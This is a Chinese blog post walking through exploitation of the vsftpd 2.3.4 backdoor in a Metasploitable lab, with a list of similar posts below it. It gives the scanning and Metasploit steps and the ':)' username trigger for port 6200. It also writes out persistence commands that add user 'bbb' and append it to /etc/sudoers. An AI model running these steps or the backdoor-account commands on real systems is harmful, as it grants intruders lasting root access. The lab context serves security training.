笑脸漏洞(vsftpd 2.3.4)

原创 已于 2025-03-06 11:19:09 修改 · 1.4k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #安全 #服务器

于 2023-07-12 15:49:34 首次发布
本文介绍了VSFTPD 2.3.4版本中的后门漏洞,该漏洞允许攻击者通过特定用户名和密码组合获取未经授权的访问。详细步骤包括:查询靶场IP、确认连接、nmap扫描发现漏洞、使用Metasploit进行攻击并成功获取root权限,以及添加并提升用户权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞原理

VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。 “vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。这个后门的存在可能导致攻击者执行恶意操作,例如未经授权地访问和修改FTP服务器上的文件。

环境

攻击机
  • kali3-amd64 (2022-11-07) x86_64 GNU/Linux
靶场
  • metasploitable 2.6.24-16-server

攻击记录

第一步:

查询目标靶场IP地址

ifconfig

在这里插入图片描述

第二步:

ping通靶场 证明可以进行正常连接

ping IP address

请添加图片描述

第三步:

在Kali中用nmap扫描目标主机的21端口,发现该靶场的ftp的版本存在笑脸漏洞(在检测到用户名带有特殊字符": )" )时,会自动打开6200端口,使用nc即可进行连接这个端口,取得管理员权限

nmap -p 21 -sV IP address

请添加图片描述

第四步

使用Metasploit 对该漏洞进行攻击

启动msfconsole

请添加图片描述

search vsftpd (搜索vsftpd漏洞)

请添加图片描述

show option

在这里插入图片描述

use 0
run

在这里插入图片描述

成功获得root权限

在这里插入图片描述

第五步

获得靶场权限,添加一个用户bbb (用户名:bbb 密码:bbb)

useradd bbb
passwd bbb

在这里插入图片描述

第六步

给我们自己用户获得root 权限

修改/etc/sudoers文件

echo "bbb ALL=(ALL) ALL" | tee -a /etc/sudoers

在这里插入图片描述

成功写入!

结果检测

  • 用户bbb登陆靶场

在这里插入图片描述

  • 用户bbb可以查看/etc/sudoers文件 提权成功!
    在这里插入图片描述
vsftpd2.3.4笑脸漏洞
weixin_51909453的博客
11-02 5056
vsftpd2.3.4笑脸漏洞 该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 。 1、靶机metasploitable2,默认登录账号和密码都是:msfadmin,登录成功后ifconfig查看靶机ip192.168.179.129 2、打开kali首先输入sudo su ,输入当前用户密码即可切换root,利用nmap -sV 192.168.
实现笑脸漏洞vsftpd2.3.4
yZGLHH的博客
12-12 3001
留着
:)笑脸漏洞
m0_62314360的博客
12-14 3644
VSFTPD v2.3.4 著名笑脸漏洞手工利用 Backdoor Command Execution:该版本的 VSFTPD 存在一个后门漏洞。虽然该问题迅速得到了开发人员的修复及删除,但是仍有不少人已经下载安装了该漏洞版本。这个后门的载荷以 :)字符的形式拼接在用户名上。后门代码绑定的侦听端口是 6200 打开Kali和靶机metasploitable2,在Kali中输入 netdiscover -r ip 来查看同一网段的靶机的ip 可以知道靶机的IP为192.168.38.132 输入.
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 5516
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
FTP笑脸漏洞
weixin_44237647的博客
01-29 3878
首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。 FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。 03 ip 192.168.10.128 metasploitable ip 192.168.10.129 (简称meta) kali ip 192.168.10.133 主机 ip 192.168.1.4 FTP在03,meta上搭建。 ...
Ftp笑脸漏洞VSFTPD 2.3.4)复现(后门漏洞
m0_62670778的博客
05-10 3655
使用nmap扫描靶机的IP地址,可以看到靶机的21端口开放,且使用了VSFTPD,版本为2.3.4。nmap扫描端口6200,观察端口打开情况:已经开启。连接6200端口,成功以root身份登入。,连接靶机的21端口,输入user带有。选项是我们需要设置的,已经设置了,还需要设置。
系统安全笑脸漏洞vsftpd2.3.4) Metasploitable2.0的俩种攻击方式
xt350488的博客
06-20 587
靶机(Metasploitable2)ip: 192.168.209.135攻击机(kali)ip:192.168.209.130。
vsftpd 2.3.4漏洞版本 可复现
09-26
然而,每个软件都有可能存在安全隐患,而vsftpd 2.3.4版本就是一个典型的例子,它携带了一个名为“笑脸漏洞”(Smiling Goat Vulnerability)的安全问题。这个漏洞允许未经身份验证的远程攻击者执行任意代码,从而对...
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞
qq_34914659的博客
08-09 3398
一、环境搭建 首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境 安装包在csdn上下载,需要50积分 https://download.csdn.net/download/sinat_32937525/11824028 1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录 tar -zxvf 压缩包名称 2.进入vsftpd目录,赋予文件权限,之后进行make &&a...
笑脸漏洞(VSFTPD2.3.4)复现
热门推荐
aarong的博客
11-01 1万+
笑脸漏洞(VSFTPD2.3.4)复现 漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞。存在于这个2.3.4版本,属于开发者设计上的失误。在检测到用户名带有特殊字符:)时,会自动打开6200端口。 攻击机:kali linux 靶机:Metasploitable2 复现过程 Nmap扫描同网断的靶机,观察靶机上的服务开放情况: nmap 192.168.43.0/24 发现靶机开放了21端口(Ftp协议),Nmap扫描出FTP服务的版本信息,扫描结果显示ftp服务版本为VSFTPD 2.3.4
笑脸:)漏洞
xujing19920814的博客
10-01 315
笑脸漏洞
漏洞扫描(笑脸漏洞
zzzrrrppp的博客
11-21 3696
先查看自己的网段。扫描本网段是存活的主机。 发现Metasploitable2-Linux靶机。 查看ftp服务的版本。vsftpd 2.3.4 ·利用笑脸漏洞链接6200端口。
笑脸漏洞复现
qq_62623325的博客
11-24 929
笑脸漏洞复现
笑脸漏洞利用
m0_51617352的博客
12-15 3158
靶机metasploit :192.168.153.132 使用nmap对靶机进行信息收集 这里可以看到21端口是开放的,版本是vsftpd2.3.4,所以笑脸漏洞是存在的 直接ftp连接靶机 用户名:user:) 密码随便填写 这时靶机的6200端口会开启 接下来用nc连接即可 最后直接可以获取root权限了 原文链接:https://blog.csdn.net/m0_62210217/article/details/121085654 ...
python检测笑脸漏洞
最新发布
Sxd2395381864的博客
10-25 377
:)
笑脸漏洞—的简单操作
qq_53639387的博客
11-11 2601
1.首先我们需要在我们的虚拟机上安装Metasploitable2虚拟系统。 进去的虚拟系统启动之后,使用用户名msfadmin,和密码msfadmin登陆 2.接下来我们需要查看IP地址,使用ifconfig命令执行 3.知道了靶机上IP,接下来在kali端打开Metasploitable2,使用nmap 靶机IP地址扫描 4. ...
vsftpd2.3.4漏洞利用与快速自动安装教程
漏洞详情:笑脸漏洞VSFTPD2.3.4漏洞) - **漏洞描述**:在VSFTPD版本2.3.4中存在一个严重的安全漏洞,通常被称作“笑脸漏洞”。这个漏洞可以让远程攻击者无需认证即能够以匿名用户身份登录,并执行一系列未授权的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值